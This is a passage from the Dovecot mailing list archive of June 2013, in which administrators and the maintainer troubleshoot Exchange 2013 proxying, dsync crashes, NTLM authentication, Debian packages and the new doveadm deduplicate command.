-0300 Subject: [Dovecot] Dovecot proxy to Microsoft Exchange 2013 In-Reply-To: <1372112521.31839.0.camel@hurina> References: <51C1F046.9090607@gmail.com> <5905F081-4105-4E17-A868-8B11B31BA550@iki.fi> <1372112521.31839.0.camel@hurina> Message-ID: <51C91B58.5040900@gmail.com> Timo, thanks for your help. But I can't compile with this patch: /imap-proxy.c: In function ?proxy_write_login?:// //imap-proxy.c:95: error: ?struct client? has no member named ?pre_proxy_auth?// //imap-proxy.c: In function ?imap_proxy_parse_line?:// //imap-proxy.c:217: error: ?struct client? has no member named ?proxy_banner?// //imap-proxy.c:288: error: ?struct client? has no member named ?post_proxy_auth?/ Em 24/06/2013 19:22, Timo Sirainen escreveu: > On Mon, 2013-06-24 at 23:40 +0300, Timo Sirainen wrote: >> Looks like Exchange 2013 IMAP has broken command pipelining :( See if it gets fixed by http://hg.dovecot.org/dovecot-2.2/rev/6e8bbc150fa9 and the attached patch on top of that? If it works, I'll commit that patch too. > Attached another patch that doesn't crash on successful logins :) > From tol at kth.se Tue Jun 25 10:29:53 2013 From: tol at kth.se (Tomas Olsson) Date: Tue, 25 Jun 2013 07:29:53 +0000 Subject: [Dovecot] dsync assert failure in 2.2.2 In-Reply-To: <6EA5D2AF40F2C948A46828308DB8AFEF2EE629DF@EXDB1.ug.kth.se> References: <6EA5D2AF40F2C948A46828308DB8AFEF2EE629C1@EXDB1.ug.kth.se>, <6EA5D2AF40F2C948A46828308DB8AFEF2EE629DF@EXDB1.ug.kth.se> Message-ID: <6EA5D2AF40F2C948A46828308DB8AFEFA6410296@EXDB6.ug.kth.se> > with 2.2.2 and today's hg, dsync crashes with > dsync(root): Panic: file ../../../../../src/lib-storage/index/mbox/mbox-lock.c: line 797 (mbox_lock): assertion failed: (lock_type == F_RDLCK || mbox->mbox_lock_type != F_RDLCK) > when I run > USER=root 2.2-hg/bin/dsync -c etc/dovecot.conf -f -o mail_location=mbox:/tmp/imap/fwadmin.tmp:INBOX=/tmp/imap/fwadmin.tmp/INBOX mirror mdbox:/tmp/imap/fwadmin > Appears to work properly again in 2.2.4. thanks /t From zoli at lippai.net Tue Jun 25 11:13:29 2013 From: zoli at lippai.net (Lippai Zoltan) Date: Tue, 25 Jun 2013 10:13:29 +0200 Subject: [Dovecot] Sieve file permission problem In-Reply-To: References: <25E4BE7C7FD74CAF870820FCE3956BBB@lippai.net> Message-ID: <8A090880-5FF3-4974-B081-4F70FAD8EAE0@lippai.net> Finally I have found out what is causing the problem, it is a known issue with manage sieve: http://dovecot.org/pipermail/dovecot/2012-September/085585.html Unfortunately the Ubuntu repository has the buggy version, I just filed a bug report to upgrade it. Hopefully they will do that, otherwise I might have to install dovecot from source. From doderde at gmail.com Tue Jun 25 11:21:39 2013 From: doderde at gmail.com (Dejan Doder) Date: Tue, 25 Jun 2013 10:21:39 +0200 Subject: [Dovecot] /etc/passwd Centos + dovecot Message-ID: Hi group , I use system users with passwords defined in /etc/passwd. How can users change their passwords ? BR Dejan From roshandawrani at gmail.com Tue Jun 25 12:33:16 2013 From: roshandawrani at gmail.com (Roshan Dawrani) Date: Tue, 25 Jun 2013 15:03:16 +0530 Subject: [Dovecot] Help installing Dovecot 1.0 on Debian 6.0.7 Message-ID: Hi, Could someone please let me know if I can get the pre-built binaries for Dovecot 1.0 for Debian 6.0? If I do "apt-get install dovecot...", I am getting Dovecot v1.2.5 installed, but it doesn't like the existing Dovecot 1.0 configuration I have, and due to some urgency, I am trying to avoid migrating the configuration to the new structure / requirements. Regards, Roshan From ronleach at tesco.net Tue Jun 25 13:00:04 2013 From: ronleach at tesco.net (Ron Leach) Date: Tue, 25 Jun 2013 11:00:04 +0100 Subject: [Dovecot] Help installing Dovecot 1.0 on Debian 6.0.7 In-Reply-To: References: Message-ID: <51C96A24.5050801@tesco.net> On 25/06/2013 10:33, Roshan Dawrani wrote: > > Could someone please let me know if I can get the pre-built binaries for > Dovecot 1.0 for Debian 6.0? > > This looks interesting: http://www.debian.org/distrib/archive You may be able merely to set another repository in apt. The distributable CDs and DVDs are available, as well. I don't know whether Dovecot will be on them, or not, nor do I understand how to find out, but they are here: http://cdimage.debian.org/cdimage/archive/6.0.7/ Dovecot 1.0.15 was the latest v1.0 in Debian. If it is not in the Debian 6 distribution, I am pretty sure it was in the Debian 5 distribution, which is also available at those sites. regards, Ron From cullinan at rocketmail.com Tue Jun 25 13:06:54 2013 From: cullinan at rocketmail.com (cullinan at rocketmail.com) Date: Tue, 25 Jun 2013 12:06:54 +0200 Subject: [Dovecot] [Bulk] Re: Help installing Dovecot 1.0 on Debian 6.0.7 In-Reply-To: <51C96A24.5050801@tesco.net> References: <51C96A24.5050801@tesco.net> Message-ID: <51C96BBE.7030307@rocketmail.com> Hi, Roshan! On 06/25/2013 12:00 PM, Ron Leach wrote: > On 25/06/2013 10:33, Roshan Dawrani wrote: >> >> Could someone please let me know if I can get the pre-built binaries for >> Dovecot 1.0 for Debian 6.0? >> >> > > This looks interesting: > > http://www.debian.org/distrib/archive > Maybe in here: ftp://ftp.de.debian.org/debian-archive/debian-backports/pool/main/d/dovecot/ Regards, Clemens From jerry at seibercom.net Tue Jun 25 13:36:49 2013 From: jerry at seibercom.net (Jerry) Date: Tue, 25 Jun 2013 06:36:49 -0400 Subject: [Dovecot] Dovecot proxy to Microsoft Exchange 2013 In-Reply-To: <5905F081-4105-4E17-A868-8B11B31BA550@iki.fi> References: <51C1F046.9090607@gmail.com> <5905F081-4105-4E17-A868-8B11B31BA550@iki.fi> Message-ID: <20130625063649.04ec5bca@scorpio> On Mon, 24 Jun 2013 23:40:57 +0300 Timo Sirainen articulated: > Looks like Exchange 2013 IMAP has broken command pipelining :( See if > it gets fixed by http://hg.dovecot.org/dovecot-2.2/rev/6e8bbc150fa9 > and the attached patch on top of that? If it works, I'll commit that > patch too. Timo, I have not really been following this thread very closely, so I am not quite sure what the problem is exactly. I have a friend who has a friend who has input on Microsoft Exchange development. If you could supply me, perhaps off list if you desire, specifics of exactly what you believe Microsoft Exchange 2013 is doing incorrectly, I could forward this information on. You would need to be quite specific though. Generalizations would not be of any use. -- Jerry ? Disclaimer: off-list followups get on-list replies or get ignored. Please do not ignore the Reply-To header. __________________________________________________________________ From tss at iki.fi Tue Jun 25 13:52:38 2013 From: tss at iki.fi (Timo Sirainen) Date: Tue, 25 Jun 2013 13:52:38 +0300 Subject: [Dovecot] Dovecot proxy to Microsoft Exchange 2013 In-Reply-To: <20130625063649.04ec5bca@scorpio> References: <51C1F046.9090607@gmail.com> <5905F081-4105-4E17-A868-8B11B31BA550@iki.fi> <20130625063649.04ec5bca@scorpio> Message-ID: <7E9F5E26-B2CF-48AA-9A39-97679700C77C@iki.fi> On 25.6.2013, at 13.36, Jerry wrote: > On Mon, 24 Jun 2013 23:40:57 +0300 > Timo Sirainen articulated: > >> Looks like Exchange 2013 IMAP has broken command pipelining :( See if >> it gets fixed by http://hg.dovecot.org/dovecot-2.2/rev/6e8bbc150fa9 >> and the attached patch on top of that? If it works, I'll commit that >> patch too. > > Timo, I have not really been following this thread very closely, so I > am not quite sure what the problem is exactly. I have a friend who has > a friend who has input on Microsoft Exchange development. If you could > supply me, perhaps off list if you desire, specifics of exactly what > you believe Microsoft Exchange 2013 is doing incorrectly, I could > forward this information on. You would need to be quite specific > though. Generalizations would not be of any use. Looking at the first mail in this thread, it looks like when Dovecot sends within one TCP packet: C CAPABILITY L LOGIN "user at domain.com.br" "123456" Exchange replies only to the CAPABILITY command with: * CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN STARTTLS UIDPLUS CHILDREN IDLE NAMESPACE LITERAL+ C OK CAPABILITY completed. Then the session gets stuck, because Dovecot doesn't send anything, only expects Exchange to also handle the LOGIN command, but it's not doing that, most likely because it didn't think that two commands could be within a single TCP packet. From roshandawrani at gmail.com Tue Jun 25 14:04:39 2013 From: roshandawrani at gmail.com (Roshan Dawrani) Date: Tue, 25 Jun 2013 16:34:39 +0530 Subject: [Dovecot] [Bulk] Re: Help installing Dovecot 1.0 on Debian 6.0.7 In-Reply-To: <51C96BBE.7030307@rocketmail.com> References: <51C96A24.5050801@tesco.net> <51C96BBE.7030307@rocketmail.com> Message-ID: Thanks a lot for the pointers, guys! Regards, Roshan On Tue, Jun 25, 2013 at 3:36 PM, wrote: > Hi, Roshan! > > On 06/25/2013 12:00 PM, Ron Leach wrote: > > On 25/06/2013 10:33, Roshan Dawrani wrote: > >> > >> Could someone please let me know if I can get the pre-built binaries for > >> Dovecot 1.0 for Debian 6.0? > >> > >> > > > > This looks interesting: > > > > http://www.debian.org/distrib/archive > > > > Maybe in here: > > ftp://ftp.de.debian.org/debian-archive/debian-backports/pool/main/d/dovecot/ > > Regards, > > Clemens > From CMarcus at Media-Brokers.com Tue Jun 25 14:14:19 2013 From: CMarcus at Media-Brokers.com (Charles Marcus) Date: Tue, 25 Jun 2013 07:14:19 -0400 Subject: [Dovecot] New deduplicate doveadm command - was Re: v2.2.4 released In-Reply-To: <1372118183.31839.2.camel@hurina> References: <1372118183.31839.2.camel@hurina> Message-ID: <51C97B8B.3080206@Media-Brokers.com> On 2013-06-24 7:56 PM, Timo Sirainen wrote: > http://dovecot.org/releases/2.2/dovecot-2.2.4.tar.gz > http://dovecot.org/releases/2.2/dovecot-2.2.4.tar.gz.sig > > OK, this should be a pretty good and stable version. > > + doveadm: Added "deduplicate" command to expunge message duplicates. Hey Timo, 2 questions on this new 'deduplicate' capability of doveadm... Obviously this could be scripted with a cron job, but I was wondering if it wouldn't make sense to do this automatically whenever messages are being moved around in the mailstore? An interesting 'feature' of gmail is that if/when you are copying lots of messages from a non gmail account to a gmail account through IMAP, if the folder you are copying from contains duplicate messages, gmail will silently discard the duplicates after the first one is successfully copied up... I discovered this a long time ago the first time I encountered an anomaly where I copied an entire folder, but the number of messages on the gmail account didn't match the number in the source folder. After comparing, I discovered that there were duplicates in the source folder, which accounted for the discrepancy. Thanks, -- Best regards, Charles From CMarcus at Media-Brokers.com Tue Jun 25 14:17:12 2013 From: CMarcus at Media-Brokers.com (Charles Marcus) Date: Tue, 25 Jun 2013 07:17:12 -0400 Subject: [Dovecot] /etc/passwd Centos + dovecot In-Reply-To: References: Message-ID: <51C97C38.5020406@Media-Brokers.com> On 2013-06-25 4:21 AM, Dejan Doder wrote: > Hi group , I use system users with passwords defined in /etc/passwd. > How can users change their passwords ? Sorry, wrong list. This is not a dovecot function, this is a function of user management. Personally, I use postfixadmin (but I also disallow users to change their own passwords)... -- Best regards, Charles From CMarcus at Media-Brokers.com Tue Jun 25 14:24:40 2013 From: CMarcus at Media-Brokers.com (Charles Marcus) Date: Tue, 25 Jun 2013 07:24:40 -0400 Subject: [Dovecot] Dovecot proxy to Microsoft Exchange 2013 In-Reply-To: <7E9F5E26-B2CF-48AA-9A39-97679700C77C@iki.fi> References: <51C1F046.9090607@gmail.com> <5905F081-4105-4E17-A868-8B11B31BA550@iki.fi> <20130625063649.04ec5bca@scorpio> <7E9F5E26-B2CF-48AA-9A39-97679700C77C@iki.fi> Message-ID: <51C97DF8.20608@Media-Brokers.com> I'm wondering if this could have anything to do with how Exchange 2013 broke recipient verification? Discussed recently on the postfix list: http://postfix.1071664.n5.nabble.com/Semi-OT-Exchange-2013-SMTP-Callout-td58922.html In that thread there is this link to a Technet discussion: http://social.technet.microsoft.com/Forums/en-US/exchangesvrdeploy/thread/91c26fd2-aa0c-4006-9326-ece609bf4f67/ On 2013-06-25 6:52 AM, Timo Sirainen wrote: > On 25.6.2013, at 13.36, Jerry wrote: > >> On Mon, 24 Jun 2013 23:40:57 +0300 >> Timo Sirainen articulated: >> >>> Looks like Exchange 2013 IMAP has broken command pipelining :( See if >>> it gets fixed by http://hg.dovecot.org/dovecot-2.2/rev/6e8bbc150fa9 >>> and the attached patch on top of that? If it works, I'll commit that >>> patch too. >> Timo, I have not really been following this thread very closely, so I >> am not quite sure what the problem is exactly. I have a friend who has >> a friend who has input on Microsoft Exchange development. If you could >> supply me, perhaps off list if you desire, specifics of exactly what >> you believe Microsoft Exchange 2013 is doing incorrectly, I could >> forward this information on. You would need to be quite specific >> though. Generalizations would not be of any use. > Looking at the first mail in this thread, it looks like when Dovecot sends within one TCP packet: > > C CAPABILITY > L LOGIN "user at domain.com.br" "123456" > > Exchange replies only to the CAPABILITY command with: > > * CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN STARTTLS UIDPLUS CHILDREN IDLE NAMESPACE LITERAL+ > C OK CAPABILITY completed. > > Then the session gets stuck, because Dovecot doesn't send anything, only expects Exchange to also handle the LOGIN command, but it's not doing that, most likely because it didn't think that two commands could be within a single TCP packet. > > -- Best regards, Charles Marcus I.T. Director Media Brokers International, Inc. 678.514.6224 | 678.514.6299 fax From buzzz at olografix.org Tue Jun 25 15:47:32 2013 From: buzzz at olografix.org (Davide Bozzelli) Date: Tue, 25 Jun 2013 14:47:32 +0200 Subject: [Dovecot] Strange Problems when deleting folders. Message-ID: <51C99164.9010709@olografix.org> Hi I'm experiencing a strange problem on my dovecot 2.0.21 setup. When i delete a folder "foo" it was correctly moved in the trash folder. If i try to delete from it the folder "foo" from the trash it gets renamed "foo1". If I try to dlete "foo1" it gets renamed foo11, and the operation could be continued figured out in an endless loop. This happens both from thunderbird and sogo (a webmail). Is it a known bug or a misconfiguration ? Thx in advance From tss at iki.fi Tue Jun 25 16:28:56 2013 From: tss at iki.fi (Timo Sirainen) Date: Tue, 25 Jun 2013 16:28:56 +0300 Subject: [Dovecot] New deduplicate doveadm command - was Re: v2.2.4 released In-Reply-To: <51C97B8B.3080206@Media-Brokers.com> References: <1372118183.31839.2.camel@hurina> <51C97B8B.3080206@Media-Brokers.com> Message-ID: <39C97085-3512-41B6-9574-8BF4F5F42F98@iki.fi> On 25.6.2013, at 14.14, Charles Marcus wrote: >> + doveadm: Added "deduplicate" command to expunge message duplicates. > > Hey Timo, > > 2 questions on this new 'deduplicate' capability of doveadm... > > Obviously this could be scripted with a cron job, but I was wondering if it wouldn't make sense to do this automatically whenever messages are being moved around in the mailstore? > > An interesting 'feature' of gmail is that if/when you are copying lots of messages from a non gmail account to a gmail account through IMAP, if the folder you are copying from contains duplicate messages, gmail will silently discard the duplicates after the first one is successfully copied up... > > I discovered this a long time ago the first time I encountered an anomaly where I copied an entire folder, but the number of messages on the gmail account didn't match the number in the source folder. After comparing, I discovered that there were duplicates in the source folder, which accounted for the discrepancy. There's currently no efficient way to do that automatically in Dovecot. Also there are several potential problems.. Like if there are duplicate Message-ID: headers, but the body is different, should that be a duplicate? What if the body is the same but headers differ with e.g. the Subject line (maybe it's just [Dovecot] prefix)? What if only the Received: headers are different? And so on.. Anyway, copy&pasting what I just wrote to another reply about doveadm deduplicate: The main idea behind it is to be able to revert some (more or less) accidental duplication of emails due to something that admin did, or possibly due to some bug in Dovecot (e.g. dsync). There are two modes of operation, both work only for duplicates within the same folder: 1) Deduplicate by message GUID. These duplicates could have only been caused by copying the mail (IMAP COPY, doveadm copy) or by "doveadm import" that imports old messages from e.g. a backup. 2) Deduplicate by Message-Id: header (-m parameter). I added this just because some people had asked for it previously. I'm not sure how/when it's actually useful. From h.reindl at thelounge.net Tue Jun 25 16:52:54 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Tue, 25 Jun 2013 15:52:54 +0200 Subject: [Dovecot] New deduplicate doveadm command - was Re: v2.2.4 released In-Reply-To: <39C97085-3512-41B6-9574-8BF4F5F42F98@iki.fi> References: <1372118183.31839.2.camel@hurina> <51C97B8B.3080206@Media-Brokers.com> <39C97085-3512-41B6-9574-8BF4F5F42F98@iki.fi> Message-ID: <51C9A0B6.4000007@thelounge.net> Am 25.06.2013 15:28, schrieb Timo Sirainen: > Also there are several potential problems.. Like if there are duplicate Message-ID: headers, > but the body is different, should that be a duplicate? the answer is simply *yes* because there must not be the same Message-ID's for different messages because the words "single unique message identifier" are pretty clear _______________________________________________________ RFC2822 Though optional, every message SHOULD have a "Message-ID:" field. Furthermore, reply messages SHOULD have "In-Reply-To:" and "References:" fields as appropriate, as described below. The "Message-ID:" field contains a single unique message identifier. The "References:" and "In-Reply-To:" field each contain one or more unique message identifiers, optionally separated by CFWS. _______________________________________________________ these days "every message SHOULD have a Message-ID:" is outdated we started many years ago to block *any* message missing the header because every sane SMTP implementation adds it if it was missing from the client and so only broken implementations which are mostly spammers would be affected -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From phillip.odam at nitorgroup.com Tue Jun 25 16:54:12 2013 From: phillip.odam at nitorgroup.com (Phillip Odam) Date: Tue, 25 Jun 2013 09:54:12 -0400 Subject: [Dovecot] Configuring TLS 1.2 In-Reply-To: <51C8E976.9090907@thelounge.net> References: <51C8E870.7090201@nitorgroup.com> <51C8E976.9090907@thelounge.net> Message-ID: <51C9A104.8050100@nitorgroup.com> > what operating system? > what openssl version? > > openssl-1.0.1 supports TLS 1.2 > openssl-1.0.0 does not > Thanks for that, yeah the OS is GNU Linux and openssl is currently at version 1.0.0. That explains it. From tss at iki.fi Tue Jun 25 17:02:17 2013 From: tss at iki.fi (Timo Sirainen) Date: Tue, 25 Jun 2013 17:02:17 +0300 Subject: [Dovecot] New deduplicate doveadm command - was Re: v2.2.4 released In-Reply-To: <51C9A0B6.4000007@thelounge.net> References: <1372118183.31839.2.camel@hurina> <51C97B8B.3080206@Media-Brokers.com> <39C97085-3512-41B6-9574-8BF4F5F42F98@iki.fi> <51C9A0B6.4000007@thelounge.net> Message-ID: <864A58D7-E622-4045-8133-A774CCBFBE49@iki.fi> On 25.6.2013, at 16.52, Reindl Harald wrote: > Am 25.06.2013 15:28, schrieb Timo Sirainen: >> Also there are several potential problems.. Like if there are duplicate Message-ID: headers, >> but the body is different, should that be a duplicate? > > the answer is simply *yes* because there must not be the same > Message-ID's for different messages because the words "single > unique message identifier" are pretty clear I'm more concerned about intentional abuse. For example if you're dropping duplicate messages by Message-ID, I could first send this reply to you privately, and then another message with same Message-ID: but different content to the mailing list, and you'd never know it without looking into the archives from web. Also I wouldn't be surprised if there still were some crappy webforms that always sent the same Message-Id.. From Ralf.Hildebrandt at charite.de Tue Jun 25 17:04:12 2013 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Tue, 25 Jun 2013 16:04:12 +0200 Subject: [Dovecot] New deduplicate doveadm command - was Re: v2.2.4 released In-Reply-To: <51C9A0B6.4000007@thelounge.net> References: <1372118183.31839.2.camel@hurina> <51C97B8B.3080206@Media-Brokers.com> <39C97085-3512-41B6-9574-8BF4F5F42F98@iki.fi> <51C9A0B6.4000007@thelounge.net> Message-ID: <20130625140412.GV23856@charite.de> * Reindl Harald : > > > Am 25.06.2013 15:28, schrieb Timo Sirainen: > > Also there are several potential problems.. Like if there are duplicate Message-ID: headers, > > but the body is different, should that be a duplicate? > > the answer is simply *yes* because there must not be the same > Message-ID's for different messages because the words "single > unique message identifier" are pretty clear > _______________________________________________________ > > RFC2822 > > Though optional, every message SHOULD have a "Message-ID:" field. > Furthermore, reply messages SHOULD have "In-Reply-To:" and > "References:" fields as appropriate, as described below. > > The "Message-ID:" field contains a single unique message identifier. > The "References:" and "In-Reply-To:" field each contain one or more > unique message identifiers, optionally separated by CFWS. > _______________________________________________________ > > these days "every message SHOULD have a Message-ID:" is outdated > > we started many years ago to block *any* message missing the > header because every sane SMTP implementation adds it if it > was missing from the client and so only broken implementations > which are mostly spammers would be affected We had one funny occurance of that particular corner-case: * Somebody sent us an email * the user's account autoreplied on the eveing upon receipt (out of office) That autoreply was sent with a message-id A * next morning, the user read the mail, and composed a personal reply * that reply was discarded by the recipient's mailserver, since it had the same message-id A (dunno why that happened, but it did!) as the auto-reply the evening before. That took me a while to discover. -- Ralf Hildebrandt Gesch?ftsbereich IT | Abteilung Netzwerk Charit? - Universit?tsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From h.reindl at thelounge.net Tue Jun 25 17:13:38 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Tue, 25 Jun 2013 16:13:38 +0200 Subject: [Dovecot] New deduplicate doveadm command - was Re: v2.2.4 released In-Reply-To: <864A58D7-E622-4045-8133-A774CCBFBE49@iki.fi> References: <1372118183.31839.2.camel@hurina> <51C97B8B.3080206@Media-Brokers.com> <39C97085-3512-41B6-9574-8BF4F5F42F98@iki.fi> <51C9A0B6.4000007@thelounge.net> <864A58D7-E622-4045-8133-A774CCBFBE49@iki.fi> Message-ID: <51C9A592.3050003@thelounge.net> Am 25.06.2013 16:02, schrieb Timo Sirainen: > On 25.6.2013, at 16.52, Reindl Harald wrote: > >> Am 25.06.2013 15:28, schrieb Timo Sirainen: >>> Also there are several potential problems.. Like if there are duplicate Message-ID: headers, >>> but the body is different, should that be a duplicate? >> >> the answer is simply *yes* because there must not be the same >> Message-ID's for different messages because the words "single >> unique message identifier" are pretty clear > > I'm more concerned about intentional abuse. For example if you're dropping duplicate > messages by Message-ID, I could first send this reply to you privately, and then another > message with same Message-ID: but different content to the mailing list, and you'd never > know it without looking into the archives from web. this is very much theory und unlikely as well as only for this specific example possible where you send both messages this way nobody is able to guess a message-ID of a regular message and replace it and veen if he knows he needs to be faster with hiss fake as the origin message - very very unlikely > Also I wouldn't be surprised if there still were some crappy webforms that > always sent the same Message-Id.. well if we take care of such crap we can stop read any RFC and would need to disable any spamfilters which especially for score based filters rely on common standards hence, these days on barracuda spamfirewall you get even a FULL score point if you send a HTML-message and subject/html-title differs -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From fafaforza at gmail.com Tue Jun 25 20:09:23 2013 From: fafaforza at gmail.com (Darek) Date: Tue, 25 Jun 2013 13:09:23 -0400 Subject: [Dovecot] Dovecot 2 and managesieve Message-ID: <51C9CEC3.9000108@gmail.com> Having some difficulty finding out whether managesieve is still a separate package (not seeing it in the FreeBSD ports tree, only one for 1.x) or whether it was integrated into the main 2.x package. I've only been using 1.2.x up to now, and trying to document a system install. So is it in the main distribution now? -- Darek From utegrad at gmail.com Tue Jun 25 21:24:54 2013 From: utegrad at gmail.com (Matthew Larsen) Date: Tue, 25 Jun 2013 11:24:54 -0700 Subject: [Dovecot] NTLM Authentication with Dovecot and Postfix Message-ID: <51C9E076.20209@gmail.com> I'm trying to get NTLM authentication working with Dovecot to authenticate Postfix SMTP clients. I can authenticate postfix smtp clients using the plain text login mechanism via Dovecot and winbind. However, using the NTLM mechanism gives me an error in my maillog that says: "dovecot: auth: winbind(?,10.20.2.0): user not authenticated: NT_STATUS_UNSUCCESSFUL". At this point, I'm rather stuck. It appears PAM and winbind work for authenticating with AD because it works with the plain text mechanism, but I'm missing something with the NTLM authentication method. Any suggestions as to what I've got wrong, or other logging I can turn up / examine that might shed some light on this? /// Logging and configuration information below /// -- When I use the LOGIN mechanism I see this in the mail logging and the message is relayed: Jun 21 13:12:58 SBSMTPNV05 postfix/smtpd[1501]: connect from nvit01b.mydomain.com[10.20.2.0] Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: auth client connected (pid=1501) Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0111#011PLAIN#011service=smtp#011nologin#011lip=10.20.4.12#011rip=10.20.2.0#011resp=AG[...snip...]g== Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: pam(myusername,10.20.2.0): lookup service=dovecot Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: pam(myusername,10.20.2.0): #1/1 style=1 msg=Password: Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: client out: OK#0111#011user=myusername Jun 21 13:12:58 SBSMTPNV05 postfix/smtpd[1501]: 54EAF8059B: client=nvit01b.mydomain.com[10.20.2.0], sasl_method=PLAIN, sasl_username=myusername Jun 21 13:12:58 SBSMTPNV05 postfix/cleanup[1504]: 54EAF8059B: message-id=<51C4B3C8.30008 at domain1.com> Jun 21 13:12:58 SBSMTPNV05 postfix/qmgr[1499]: 54EAF8059B: from=, size=2700, nrcpt=1 (queue active) Jun 21 13:12:58 SBSMTPNV05 postfix/smtpd[1501]: disconnect from nvit01b.mydomain.com[10.20.2.0] Jun 21 13:12:59 SBSMTPNV05 postfix/smtp[1505]: 54EAF8059B: to=, relay=gmail-smtp-in.l.google.com[74.125.25.27]:25, delay=1.2, delays=0.23/0.04/0.16/0.72, dsn=2.0.0, status=sent (250 2.0.0 OK 1371845579 wf5si3786287pab.138 - gsmtp) Jun 21 13:12:59 SBSMTPNV05 postfix/qmgr[1499]: 54EAF8059B: removed -- I also see this in the secure log: Jun 21 13:12:58 SBSMTPNV05 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=myusername rhost=10.20.2.0 user=myusername Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:auth): getting password (0x00000010) Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:auth): pam_get_item returned a password Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:auth): user 'myusername' granted access Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:account): user 'myusername' granted access -- However, when I switch the mechanism to NTLM in the Thurnderbird MUA I see this: Jun 21 13:15:46 SBSMTPNV05 postfix/smtpd[1506]: connect from nvit01b.mydomain.com[10.20.2.0] Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libauthdb_ldap.so Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libdriver_sqlite.so Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libmech_gssapi.so Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: auth client connected (pid=1506) Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0111#011NTLM#011service=smtp#011nologin#011lip=10.20.4.12#011rip=10.20.2.0#011resp=TlRMT[...snip...]A= Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: client out: CONT#0111#011TlRMT[[...snip...]A Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: client in: CONT#0111#011TlRMT[...snip...]A= Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: winbind(?,10.20.2.0): user not authenticated: NT_STATUS_UNSUCCESSFUL Jun 21 13:15:48 SBSMTPNV05 postfix/smtpd[1506]: warning: nvit01b.mydomain.com[10.20.2.0]: SASL NTLM authentication failed: TlRMT[...snip...]A Jun 21 13:15:48 SBSMTPNV05 dovecot: auth: Debug: client out: FAIL#0111 Jun 21 13:15:49 SBSMTPNV05 postfix/smtpd[1506]: disconnect from nvit01b.mydomain.com[10.20.2.0] -- with nothing in the secure log and I don't see anything show up in the winbind logs either. -- I've reviewed these pages as reference, and I'm not sure what I'm missing: http://wiki2.dovecot.org/HowTo/ActiveDirectoryNtlm http://wiki2.dovecot.org/Authentication/Mechanisms/NTLM http://www.dovecot.org/list/dovecot/2008-December/035630.html http://www.dovecot.org/list/dovecot/2010-February/046763.html http://blog.al-shami.net/2008/05/freebsd-postfix-dovecot-and-active-directory/ http://wiki2.dovecot.org/HowTo/PostfixAndDovecotSASL -- Here's some of my relevant configuration as I understand it: -- I've joined the computer to the AD domain. The wbinfo tests work fine: # wbinfo -t checking the trust secret for domain MYDOMAIN via RPC calls succeeded # doveconf -n # 2.0.9: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-358.11.1.el6.x86_64 x86_64 CentOS release 6.4 (Final) auth_debug_passwords = yes auth_mechanisms = plain ntlm login auth_use_winbind = yes auth_username_format = %Lu listen = * mbox_write_locks = fcntl passdb { driver = pam } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } } ssl_cert = References: <51C9CEC3.9000108@gmail.com> Message-ID: <1B3D9A10-A588-46C2-BD42-895E86A58197@froglogic.com> On Jun 25, 2013, at 7:09 PM, Darek wrote: > Having some difficulty finding out whether managesieve is still a separate package (not seeing it in the FreeBSD ports tree, only one for 1.x) or whether it was integrated into the main 2.x package. > > I've only been using 1.2.x up to now, and trying to document a system install. So is it in the main distribution now? It's part of the pigeonhole plugin, I think; see /usr/ports/mail/dovecot2-pigeonhole -- Frerich Raabe - raabe at froglogic.com www.froglogic.com - Multi-Platform GUI Testing From andretta at apf.it Tue Jun 25 17:59:40 2013 From: andretta at apf.it (Paolo Andretta) Date: Tue, 25 Jun 2013 16:59:40 +0200 (CEST) Subject: [Dovecot] /etc/passwd Centos + dovecot In-Reply-To: References: Message-ID: On Tue, 25 Jun 2013, Dejan Doder wrote: > Hi group , I use system users with passwords defined in /etc/passwd. > How can users change their passwords ? I don't think this is dovecot related, but you can use squirrelmail + plug-in or roundcube + plugin or directly with a web interface to poppassd or usermin, or ... -- Regards, Paolo ____________________________________________ From h.reindl at thelounge.net Tue Jun 25 23:01:44 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Tue, 25 Jun 2013 22:01:44 +0200 Subject: [Dovecot] /etc/passwd Centos + dovecot In-Reply-To: References: Message-ID: <51C9F728.40800@thelounge.net> Am 25.06.2013 16:59, schrieb Paolo Andretta: > On Tue, 25 Jun 2013, Dejan Doder wrote: > >> Hi group , I use system users with passwords defined in /etc/passwd. >> How can users change their passwords ? > > I don't think this is dovecot related, but you can use 